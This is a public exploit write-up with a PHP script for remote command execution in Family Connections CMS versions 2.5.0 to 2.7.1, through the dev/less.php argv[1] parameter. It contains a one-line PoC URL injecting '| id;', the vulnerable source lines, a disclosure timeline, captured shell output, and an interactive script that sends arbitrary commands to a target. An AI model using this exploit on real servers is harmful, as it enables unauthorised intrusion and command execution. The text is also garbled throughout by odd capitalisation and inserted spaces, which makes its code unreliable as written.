Family Connections CMS v2.5.0-v2.7.1 (less. php) Remote Command Execution

 

<? Php

/*

Family connections CMS v2.5.0-v2.7.1 remote command execution exploit

Developer: https://www.familycms.com/

: Https://www.familycms.com/download.php

Author: mr_me: rwx kru

Email: steventhomasseeley! Gmail! Com

----------------------------------

Php. ini requirements:

Register_globals = On

Register_argc_argv = Off

 

This bug is almost identical to CVE-2005-2651

Poc: http://www.bkjia.com/[path]/dev/less. php? Argv [1] = | id;

 

The vulnerable code is on lines 20-36 in./dev/less. php:

-->

$ Theme = isset ($ argv [1])? $ Argv [1]: 'default ';

 

System ("clear ");

 

If (file_exists ("$ dir/themes/$ theme/style.css "))

{

Echo "\ n [themes/$ theme/style.css] already exists. \ n ";

Echo "Overwrite [y/n]? ";

$ Handle = fopen ("php: // stdin", "r ");

$ Line = fgets ($ handle );

If (trim ($ line )! = 'Y ')

{

Exit;

}

}

 

$ Worked = system ("php-q ~ /Bin/lessphp/lessc $ dir/themes/$ theme/dev. less> $ dir/themes/$ theme/style.css ");

<--

 

Timeline:

-Nov 28th discovered and reported using ticket 407 (http://sourceforge.net/apps/trac/fam-connections/ticket/407)

-Dec 2nd, vendors stated that they will fix the issue

-Dec 4th, vendors keep pushing back release 2.7.2 with no proper planned date

-Dec 4th, Public disclosure

-----------------------------------

Mr_me @ gliese :~ /Pentest/web/0day/fcms $ php poc. php-t 192.168.220.128/webapps/FCMS_2.7.1/-p 127.0.0.1: 8080

 

--------------------------------------------------------------------------------

Family Connections CMS v2.5.0-v2.7.1 (less. php) remote command execution exploit

By mr_me of rwx kru-net-ninja.net/rwx. biz. nf

--------------------------------------------------------------------------------

(+) Setting the proxy to Fig: 8080

 

Mr_me@192.168.220.128 # id

Uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)

Mr_me@192.168.220.128 # uname-

Linux steve-web-server 2.6.35-31-generic # 62-Ubuntu SMP Tue Nov 8 14:00:30 UTC 2011 i686 GNU/Linux

Mr_me@192.168.220.128 # q

*/

 

Print_r ("

--------------------------------------------------------------------------------

Family Connections CMS v2.5.0-v2.7.1 (less. php) remote command execution exploit

By mr_me of rwx kru-net-ninja.net/rwx. biz. nf

--------------------------------------------------------------------------------

");

 

If ($ argc <3 ){

Print_r ("

-----------------------------------------------------------------------------

Usage: php ". $ argv [0]."-t

Host: target server (ip/hostname)

Path: directory path to wordpress

Options:

-P [ip: port]: specify a proxy

Example:

Php ". $ argv [0]."-t 192.168.1.5-d/wp/-p FIG: 8080

Php ". $ argv [0]."-t 192.168.1.5-d/wp/

-----------------------------------------------------------------------------

"); Die;

}

 

Error_reporting (7 );

Ini_set ("max_execution_time", 0 );

Ini_set ("default_socket_timeout", 5 );

 

$ Proxy_regex = "(\ B \ d {1, 3} \. \ d {1, 3} \. \ d {1, 3} \. \ d {1, 3} \ B )";

 

Function setArgs ($ argv ){

$ _ ARG = array ();

Foreach ($ argv as $ arg ){

If (ereg ("-- ([^ =] +) = (. *)", $ arg, $ reg )){

$ _ ARG [$ reg [1] = $ reg [2];

} Elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){

$ _ ARG [$ reg [1] = "true ";

} Else {

$ _ ARG ["input"] [] = $ arg;

}

}

Return $ _ ARG;

}

 

 

$ MyArgs = setArgs ($ argv );

$ Host = $ myArgs ["input"] ["1"];

$ Path = $ myArgs ["input"] ["2"];

 

If (strpos ($ host, ":") = true ){

$ HostAndPort = explode (":", $ myArgs ["input"] [1]);

$ Host = $ hostAndPort [0];

$ Port = (int) $ hostAndPort [1];

} Else {

$ Port = 80;

}

 

 

If (strcmp ($ myArgs ["p"], "true") === 0 ){

$ ProxyAndPort = explode (":", $ myArgs ["input"] [3]);

$ Proxy = $ proxyAndPort [0];

$ Pport = $ proxyAndPort [1];

Echo "(+) Setting the proxy to". $ proxy. ":". $ pport. "\ r \ n ";

} Else {

Echo "(-) Warning, a proxy was not set \ r \ n ";

}

 

// Rgods sendpacketii () function

Function sendpacket ($ packet ){

Global $ myArgs, $ proxy, $ host, $ pport, $ port, $ html, $ proxy_regex;

If (strcmp ($ myArgs ["p"], "true ")! = 0 ){

$ Ock = fsockopen (gethostbyname ($ host), $ port );

If (! $ Ock ){

Echo "(-) No response from". $ host. ":". $ port; die;

}

}

Else {

$ C = preg_match ($ proxy_regex, $ proxy );

If (! $ C ){

Echo "(-) Not a valid proxy... \ n"; die;

}

$ Ock = fsockopen ($ proxy, $ pport );

If (! $ Ock ){

Echo "(-) No response from proxy..."; die;

}

}

Fputs ($ ock, $ packet );

If ($ proxy = ""){

$ Html = "";

While (! Feof ($ ock )){

$ Html. = fgets ($ ock );

}

} Else {

$ Html = "";

While ((! Feof ($ ock) or (! Eregi (chr (0x0d). chr (0x0a). chr (0x0d). chr (0x0a), $ html ))){

$ Html. = fread ($ ock, 1 );

}

}

Fclose ($ ock );

}

 

If (strcmp ($ myArgs ["p"], "true ")! = 0) {$ p = $ path;} else {$ p = "http: //". $ host. ":". $ port. $ path ;}

 

Function read (){

$ Fp1 = fopen ("/dev/stdin", "r ");

$ Input = fgets ($ fp1, 255 );

Fclose ($ fp1 );

Return $ input;

}

 

While ($ cmd! = "Q "){

Echo "\ n". get_current_user (). "@". $ host ."#";

$ Cmd = trim (read ());

$ C = urlencode ("echo fcms_start;". $ cmd. "; echo fcms_end ");

$ Packet = "GET". $ p. "dev/less. php? Argv [1] = | ". $ c."; HTTP/1.1 \ r \ n ";

$ Packet. = "host:". $ host. "\ r \ n ";

If ($ cmd! = "Q "){

Sendpacket ($ packet );

$ Html = explode ("fcms_start", $ html );

$ ___ Response = explode ("fcms_end", $ html [2]);

Echo (trim ($ ___ response [0]);

}

}

?>